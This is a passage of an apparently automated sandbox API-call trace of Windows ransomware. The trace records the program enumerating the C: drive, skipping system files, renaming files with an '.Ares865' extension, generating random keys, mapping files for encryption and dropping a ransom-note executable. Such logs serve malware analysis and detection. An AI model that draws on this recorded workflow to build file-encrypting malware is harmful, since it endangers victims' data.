lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.832] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=123206) returned 1 [0173.833] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.833] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.833] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.842] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.843] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.843] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.845] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="Faces.pdf" | out: lpString1="Faces.pdf") returned="Faces.pdf" [0173.845] lstrlenW (lpString="Faces.pdf") returned 9 [0173.845] lstrlenW (lpString="Ares865") returned 7 [0173.845] lstrcmpiW (lpString1="ces.pdf", lpString2="Ares865") returned 1 [0173.845] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Faces.pdf.Ares865") returned 97 [0173.845] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\faces.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Faces.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\faces.pdf.ares865"), dwFlags=0x1) returned 1 [0173.847] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Faces.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\faces.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.847] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=33013) returned 1 [0173.847] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.848] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.848] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 Thread: id = 7 os_tid = 0x9f0 [0039.341] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2ca278 [0039.341] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d38 [0039.341] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" | out: lpString1="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe") returned="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" [0039.341] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2e77f0 [0039.341] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:", iMaxLength=260 | out: lpString1="C:") returned="C:" [0039.341] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.341] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77e8 | out: hHeap=0x2b0000) returned 1 [0039.341] lstrlenW (lpString="C:") returned 2 [0039.341] lstrcatW (in: lpString1="", lpString2="C:" | out: lpString1="C:") returned="C:" [0039.341] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.341] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\how to back your files.exe"), bFailIfExists=1) returned 0 [0039.342] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0039.342] GetLastError () returned 0x0 [0039.342] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0039.342] ReadFile (in: hFile=0xec, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0039.342] CloseHandle (hObject=0xec) returned 1 [0039.342] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0039.342] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0039.342] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x2ca380 [0039.342] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.346] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="aoldtz.exe") returned -1 [0039.346] lstrcmpiW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0039.346] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0039.346] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="windows") returned -1 [0039.346] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="bootmgr") returned -1 [0039.346] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="temp") returned -1 [0039.346] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="pagefile.sys") returned -1 [0039.346] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="boot") returned -1 [0039.346] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="ids.txt") returned -1 [0039.346] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="ntuser.dat") returned -1 [0039.346] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="perflogs") returned -1 [0039.346] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="MSBuild") returned -1 [0039.346] lstrlenW (lpString="$Recycle.Bin") returned 12 [0039.346] lstrlenW (lpString="C:\\*") returned 4 [0039.346] lstrcpyW (in: lpString1=0x2e2e866, lpString2="$Recycle.Bin" | out: lpString1="$Recycle.Bin") returned="$Recycle.Bin" [0039.346] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7788 [0039.346] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2c9320 [0039.346] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7790 | out: ListHead=0x2e77d0, ListEntry=0x2e7790) returned 0x0 [0039.346] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0039.346] lstrcmpiW (lpString1="Boot", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.346] lstrcmpiW (lpString1="Boot", lpString2="aoldtz.exe") returned 1 [0039.346] lstrcmpiW (lpString1="Boot", lpString2=".") returned 1 [0039.346] lstrcmpiW (lpString1="Boot", lpString2="..") returned 1 [0039.346] lstrcmpiW (lpString1="Boot", lpString2="windows") returned -1 [0039.346] lstrcmpiW (lpString1="Boot", lpString2="bootmgr") returned -1 [0039.346] lstrcmpiW (lpString1="Boot", lpString2="temp") returned -1 [0039.346] lstrcmpiW (lpString1="Boot", lpString2="pagefile.sys") returned -1 [0039.346] lstrcmpiW (lpString1="Boot", lpString2="boot") returned 0 [0039.346] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0039.346] lstrcmpiW (lpString1="bootmgr", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.346] lstrcmpiW (lpString1="bootmgr", lpString2="aoldtz.exe") returned 1 [0039.346] lstrcmpiW (lpString1="bootmgr", lpString2=".") returned 1 [0039.346] lstrcmpiW (lpString1="bootmgr", lpString2="..") returned 1 [0039.346] lstrcmpiW (lpString1="bootmgr", lpString2="windows") returned -1 [0039.347] lstrcmpiW (lpString1="bootmgr", lpString2="bootmgr") returned 0 [0039.347] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="aoldtz.exe") returned 1 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".") returned 1 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="..") returned 1 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="windows") returned -1 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="bootmgr") returned 1 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="temp") returned -1 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="pagefile.sys") returned -1 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="boot") returned 1 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="ids.txt") returned -1 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="ntuser.dat") returned -1 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="perflogs") returned -1 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="MSBuild") returned -1 [0039.347] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0039.347] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0039.347] lstrcpyW (in: lpString1=0x2e2e866, lpString2="BOOTSECT.BAK" | out: lpString1="BOOTSECT.BAK") returned="BOOTSECT.BAK" [0039.347] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0039.347] lstrlenW (lpString="Ares865") returned 7 [0039.347] lstrcmpiW (lpString1="ECT.BAK", lpString2="Ares865") returned 1 [0039.347] lstrlenW (lpString=".dll") returned 4 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".dll") returned 1 [0039.347] lstrlenW (lpString=".lnk") returned 4 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".lnk") returned 1 [0039.347] lstrlenW (lpString=".ini") returned 4 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".ini") returned 1 [0039.347] lstrlenW (lpString=".sys") returned 4 [0039.347] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".sys") returned 1 [0039.347] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0039.347] lstrlenW (lpString="bak") returned 3 [0039.347] lstrcmpiW (lpString1="BAK", lpString2="bak") returned 0 [0039.347] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\BOOTSECT.BAK.Ares865") returned 23 [0039.348] MoveFileExW (lpExistingFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), lpNewFileName="C:\\BOOTSECT.BAK.Ares865" (normalized: "c:\\bootsect.bak.ares865"), dwFlags=0x1) returned 1 [0039.348] CreateFileW (lpFileName="C:\\BOOTSECT.BAK.Ares865" (normalized: "c:\\bootsect.bak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0xf8 [0039.348] GetFileSizeEx (in: hFile=0xf8, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=8192) returned 1 [0039.348] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2e30020 [0039.349] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cc4f8 [0039.349] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0039.349] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0039.350] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0039.350] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0039.350] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x100 [0039.394] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x190000 [0039.395] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0039.552] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0039.552] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cc760 [0039.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc760 | out: hHeap=0x2b0000) returned 1 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cc760 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0039.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc760 | out: hHeap=0x2b0000) returned 1 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cc760 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d48 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x204) returned 0x2cc970 [0039.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x204) returned 0x2ccb80 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2ccd90 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x20c) returned 0x2cce98 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d48 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2f8cd8 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae48 [0039.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ccd90 | out: hHeap=0x2b0000) returned 1 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x204) returned 0x2cd0b0 [0039.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae48 | out: hHeap=0x2b0000) returned 1 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2f8cf0 [0039.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d48 | out: hHeap=0x2b0000) returned 1 [0039.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2eae48 [0039.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8cf0 | out: hHeap=0x2b0000) returned 1 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x204) returned 0x2cd2c0 [0039.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae48 | out: hHeap=0x2b0000) returned 1 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] 